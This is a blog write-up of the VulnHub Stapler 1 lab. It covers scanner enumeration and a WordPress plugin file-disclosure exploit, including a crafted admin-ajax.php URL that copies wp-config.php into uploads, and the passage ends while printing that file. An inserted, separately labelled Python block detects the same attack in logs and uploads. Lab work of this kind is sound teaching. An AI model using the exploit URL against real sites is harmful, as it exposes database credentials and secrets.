VulnHub Stapler 1 Solution 2 (Secure Belief, Amol Naik, 2016-06-09)<div dir="ltr" style="text-align: left;" trbidi="on">
You can find Solution 1 <a href="http://amolnaik4.blogspot.in/2016/06/vulnhub-stapler-1-solution.html">here</a>.<br />
<br />
After spending a night on this, I finally managed to find the 2nd way to get a limited shell on this box. Let's see how this is done.<br />
<br />
From the nmap scan, we know there are two HTTP ports, i.e. 80 and 12380.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">80/tcp open http syn-ack ttl 64</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: 404 Not Found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: Tim, we need to-do better next year for Initech</span><br />
<br />
When accessed with a browser, port 80 returns 404 for almost every request, and port 12380 presents a static page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-hA0sr4m0m_s/V1pDZhENxoI/AAAAAAAABfs/K0_eQNpV9BwoEygXeWbcbxHB6EkBEm9dACLcB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-42-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://4.bp.blogspot.com/-hA0sr4m0m_s/V1pDZhENxoI/AAAAAAAABfs/K0_eQNpV9BwoEygXeWbcbxHB6EkBEm9dACLcB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-42-35.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Ij-kBMPgqik/V1pDaRdngJI/AAAAAAAABf0/LRDZ8APERowe38i-w0Zp5eZRlmk2bdQTACKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-43-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://2.bp.blogspot.com/-Ij-kBMPgqik/V1pDaRdngJI/AAAAAAAABf0/LRDZ8APERowe38i-w0Zp5eZRlmk2bdQTACKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-43-56.png" width="640" /></a></div>
<br />
<br />
I ran nikto on both the ports.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# nikto -h 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">- Nikto v2.1.6</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Port: 80</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Start Time: 2016-06-09 13:25:35 (GMT-4)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server: No banner retrieved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The anti-clickjacking X-Frame-Options header is not present.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ End Time: 2016-06-09 13:26:07 (GMT-4) (32 seconds)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#</span><br />
<br />
This shows a couple of files that look like they come from someone's home directory and are mostly useless. Port 12380 gives a few more pointers.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# nikto -h 192.168.1.3 -p 12380</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">- Nikto v2.1.6</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Port: 12380</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ <b>SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Ciphers: ECDHE-RSA-AES256-GCM-SHA384</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Start Time: 2016-06-09 13:26:33 (GMT-4)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The anti-clickjacking X-Frame-Options header is not present.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Entry '<b>/admin112233/</b>' in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Entry '<b>/blogblog/</b>' in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ "robots.txt" contains 2 entries which should be manually viewed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Hostname '192.168.1.3' does not match certificate's names: Red.Initech</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Uncommon header 'x-ob_mode' found, with contents: 1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3233: /icons/README: Apache default file found.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ <b>/phpmyadmin/: phpMyAdmin directory found</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ End Time: 2016-06-09 13:38:40 (GMT-4) (727 seconds)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#</span><br />
<br />
To my surprise, nikto shows that port 12380 runs over SSL, which nmap could not detect. This was a huge success. Nikto was able to find 'robots.txt' and listed the directories in it. It also found 'phpMyAdmin'. The 'admin112233' directory plays a good prank with a hardcoded JavaScript alert and a redirection to http://www.xss-payloads.com/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-vB8I_19Xd8o/V1pFanu6tWI/AAAAAAAABgE/Ypfr8Da9RqIEY6bJQ-vJpgn-OA87Qn9AwCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-44-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="434" src="https://3.bp.blogspot.com/-vB8I_19Xd8o/V1pFanu6tWI/AAAAAAAABgE/Ypfr8Da9RqIEY6bJQ-vJpgn-OA87Qn9AwCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-44-59.png" width="640" /></a></div>
<br />
<br />
The other directory, 'blogblog', is a WordPress installation which is the internal company blog.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-xzWZ2IDOIm8/V1pFa5cW3TI/AAAAAAAABgI/Z82yjKp828MW5FkZB2zU28jNmsW_c6K2ACKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-46-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="500" src="https://3.bp.blogspot.com/-xzWZ2IDOIm8/V1pFa5cW3TI/AAAAAAAABgI/Z82yjKp828MW5FkZB2zU28jNmsW_c6K2ACKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-46-04.png" width="640" /></a></div>
<br />
Next I ran 'WPScan' on this directory. The result did not show any vulnerability which could gain access to the server. WPScan detected the wp_untrash_post_comments SQL Injection vulnerability; however, this requires a post to be trashed by the admin. This could have been done, as I managed to get into the WordPress login with the 'elly' account which was discovered in Solution 1. I left this, as I thought it was not the expected solution.<br />
<br />
There is another tool, 'CMSmap', which enumerates CMS applications and gives good information.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amolnaik@sandb0x:~/tools/CMSmap$ ./cmsmap.py -t https://192.168.1.3:12380/blogblog/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Date & Time: 10/06/2016 01:08:27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Target: https://192.168.1.3:12380/blogblog</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Server: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] X-Frame-Options: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Strict-Transport-Security: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] X-Content-Security-Policy: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] X-Content-Type-Options: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] No Robots.txt Found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] CMS Detection: Wordpress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Wordpress Version: 4.2.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Wordpress Theme: bhost</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Enumerating Wordpress Usernames via "Feed" ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Enumerating Wordpress Usernames via "Author" ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] John Smith</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] abby</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] asd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] barry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] dave</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] garry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] harry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] heather</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] john</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] kathy</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] pam</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] peter</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] scott</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] simon</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] tim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] vicki</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] zoe</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Forgotten Password Allows Username Enumeration: https://192.168.1.3:12380/blogblog/wp-login.php?action=lostpassword</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] Website vulnerable to XML-RPC Brute Force Vulnerability</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Autocomplete Off Not Found: https://192.168.1.3:12380/blogblog/wp-login.php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Default WordPress Files:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/readme.html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/images/crystal/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/images/crystal/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/plupload/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/tinymce/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/swfupload/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/readme.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/license.commercial.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Searching Wordpress Plugins ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] akismet</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Searching Wordpress TimThumbs ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Checking for Directory Listing Enabled ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] <b>https://192.168.1.3:12380/blogblog/wp-content/</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] <b>https://192.168.1.3:12380/blogblog/wp-includes/</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Date & Time: 10/06/2016 01:13:25</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Completed in: 0:04:57</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amolnaik@sandb0x:~/tools/CMSmap$</span><br />
<br />
CMSmap found directory listing enabled for /wp-content/ and /wp-includes/.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-sef1o2-6fxA/V1pFblrp3UI/AAAAAAAABhU/N0CPE_EQffQtdLyFAM40PI7_9uEBVeDQQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-47-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://3.bp.blogspot.com/-sef1o2-6fxA/V1pFblrp3UI/AAAAAAAABhU/N0CPE_EQffQtdLyFAM40PI7_9uEBVeDQQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-47-35.png" width="640" /></a></div>
The 'wp-content' directory lists the installed plugins, and WordPress plugins are known to have serious vulnerabilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-RvzAgaWGn-o/V1pFcNWLzgI/AAAAAAAABhU/EVtyA4MKRIMSY23SboZNtei4M23K6ms5gCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-48-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="349" src="https://1.bp.blogspot.com/-RvzAgaWGn-o/V1pFcNWLzgI/AAAAAAAABhU/EVtyA4MKRIMSY23SboZNtei4M23K6ms5gCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-48-02.png" width="640" /></a></div>
I picked the 'advanced-video-embed' plugin to investigate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-VGbQ_oi0K9M/V1pFcLUbqqI/AAAAAAAABhU/VI8XwXNHlTAmstEmIsgsOYVh07nzgZqfgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-48-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://3.bp.blogspot.com/-VGbQ_oi0K9M/V1pFcLUbqqI/AAAAAAAABhU/VI8XwXNHlTAmstEmIsgsOYVh07nzgZqfgCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-48-55.png" width="640" /></a></div>
<br />
This plugin is version 1.0 and is vulnerable to a file disclosure vulnerability. Exploit-DB has an exploit for this:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://www.exploit-db.com/exploits/39646/">https://www.exploit-db.com/exploits/39646/</a></span><br />
<br />
The exploit code didn't work as the target site has an invalid certificate, so I decided to do it manually. After reading the code, I crafted the URL below to fetch the 'wp-config.php' file, which is the configuration file for WordPress.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php</span><br />
<br />
This gives the response below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-lfuruOkG19w/V1pFccog4RI/AAAAAAAABhU/KWcf807VQOIzfG_5XzJ1A-FJe1Gs4sLOgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-51-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-lfuruOkG19w/V1pFccog4RI/AAAAAAAABhU/KWcf807VQOIzfG_5XzJ1A-FJe1Gs4sLOgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-51-57.png" /></a></div>
When I accessed the main site, there was a new post with the title 'random'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-fo1lGwjL5DU/V1pFdOGJ1-I/AAAAAAAABhU/kQJ9bUd7DZUaeQALpFTGcVTn-vQ_kEJGgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-52-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://3.bp.blogspot.com/-fo1lGwjL5DU/V1pFdOGJ1-I/AAAAAAAABhU/kQJ9bUd7DZUaeQALpFTGcVTn-vQ_kEJGgCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-52-30.png" width="640" /></a></div>
<br />
Notice '1829704549.jpeg' above the title 'random'. In the page source, this has a link to the actual location of the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-j08dTx6J8y8/V1pFdCjDscI/AAAAAAAABhU/-ULiATTdo68639b4I6DjPPM34ydddXF3QCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-53-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://3.bp.blogspot.com/-j08dTx6J8y8/V1pFdCjDscI/AAAAAAAABhU/-ULiATTdo68639b4I6DjPPM34ydddXF3QCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-53-28.png" width="640" /></a></div>
<br />
Basically, this exploit creates a file in the /wp-content/uploads/ directory with a .jpeg extension; however, this is not a valid JPEG file, it is text with the content of the requested file, in this case wp-config.php.<br />
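As an added example (not part of the original write-up or of the plugin's code), the following Python implements two defender-side checks for the behaviour just described: it flags admin-ajax.php requests carrying the ave_publishPost action whose 'thumb' parameter is not a remote http(s) URL, run over constructed Apache access-log lines, and it verifies that files named .jpeg in wp-content/uploads/ actually start with the JPEG SOI marker, which is the mismatch the file command reports further down. The log lines, file contents and IP addresses are constructed samples; only the parameter names come from the URL in the write-up.<br />

```python
"""Added example: defender-side checks for the advanced-video-embed
file-disclosure pattern (local file read via the 'thumb' parameter,
written into wp-content/uploads/ as a fake .jpeg).

Not part of the original write-up; sample log lines and file bytes below
are constructed, the plugin parameter names come from the write-up's URL.
"""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined-log prefix: client, ident, user, [timestamp], "METHOD target PROTO", status
_REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Every JPEG/JFIF file begins with the Start Of Image marker FF D8 FF.
JPEG_SOI = b"\xff\xd8\xff"


def suspicious_thumb(thumb: str) -> bool:
    """True when 'thumb' points anywhere other than a remote http(s) URL.

    The plugin's intended input is a remote thumbnail URL; a relative path,
    a traversal sequence (../wp-config.php) or any other scheme means the
    value will be read from the local filesystem or a stream wrapper.
    Remote URLs are accepted here, so SSRF toward internal hosts still needs
    a separate review; this check only targets the local-read case.
    """
    value = unquote(thumb).strip()
    return urlsplit(value).scheme.lower() not in ("http", "https")


def scan_access_log(lines):
    """Return one finding per ave_publishPost request with a suspicious thumb."""
    findings = []
    for line in lines:
        m = _REQUEST_RE.match(line)
        if not m:
            continue                      # not a combined-format request line
        src_ip, ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query)        # parse_qs already percent-decodes values
        if qs.get("action", [""])[0] != "ave_publishPost":
            continue
        thumb = qs.get("thumb", [""])[0]
        if suspicious_thumb(thumb):
            findings.append({"ip": src_ip, "time": ts,
                             "thumb": unquote(thumb), "status": int(status)})
    return findings


def looks_like_jpeg(data: bytes) -> bool:
    """Content check independent of the file extension."""
    return data[:3] == JPEG_SOI


def audit_uploads(files):
    """files: {name: bytes}. Names ending in .jpeg/.jpg whose bytes are not JPEG."""
    return sorted(name for name, data in files.items()
                  if name.lower().endswith((".jpeg", ".jpg"))
                  and not looks_like_jpeg(data))


def audit_uploads_dir(path):
    """Same check against a real uploads directory (reads only the first 3 bytes)."""
    files = {}
    for entry in os.scandir(path):
        if entry.is_file():
            with open(entry.path, "rb") as fh:
                files[entry.name] = fh.read(3)
    return audit_uploads(files)


# Constructed sample log: a normal page hit, the disclosure request shape from the
# write-up, a legitimate remote-thumbnail use, and the retrieval of the fake image.
SAMPLE_LOG = [
    '192.168.1.10 - - [09/Jun/2016:22:50:12 -0400] "GET /blogblog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [09/Jun/2016:22:51:57 -0400] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [09/Jun/2016:22:52:30 -0400] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=vid&short=1&term=1&thumb=https%3A%2F%2Fimg.example%2Fthumb.jpg HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [09/Jun/2016:22:54:09 -0400] "GET /blogblog/wp-content/uploads/1829704549.jpeg HTTP/1.1" 200 3042 "-" "Wget/1.17"',
]

# Constructed uploads: a PHP file saved under a .jpeg name, and a real JFIF header.
SAMPLE_UPLOADS = {
    "1829704549.jpeg": b"<?php\n/**\n * The base configurations of the WordPress.\n",
    "logo.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
}

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[!] {f['time']} {f['ip']} ave_publishPost thumb={f['thumb']!r} status={f['status']}")
    for name in audit_uploads(SAMPLE_UPLOADS):
        print(f"[!] {name}: extension says JPEG but content lacks the SOI marker")
```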
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# wget --no-check-certificate https://192.168.1.3:12380/blogblog/wp-content/uploads/1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-09 22:54:09-- https://192.168.1.3:12380/blogblog/wp-content/uploads/1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.3:12380... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WARNING: The certificate of ‘192.168.1.3’ is not trusted.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WARNING: The certificate of ‘192.168.1.3’ hasn't got a known issuer.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">The certificate's owner does not match hostname ‘192.168.1.3’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 3042 (3.0K) [image/jpeg]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: ‘1829704549.jpeg’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1829704549.jpeg 100%[===================>] 2.97K --.-KB/s in 0s </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-09 22:54:09 (55.9 MB/s) - ‘1829704549.jpeg’ saved [3042/3042]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# file 1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1829704549.jpeg: PHP script, ASCII text</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat 1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><?php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * The base configurations of the WordPress.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * This file has the following configurations: MySQL settings, Table Prefix,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Secret Keys, and ABSPATH. You can find more information by visiting</span><br />
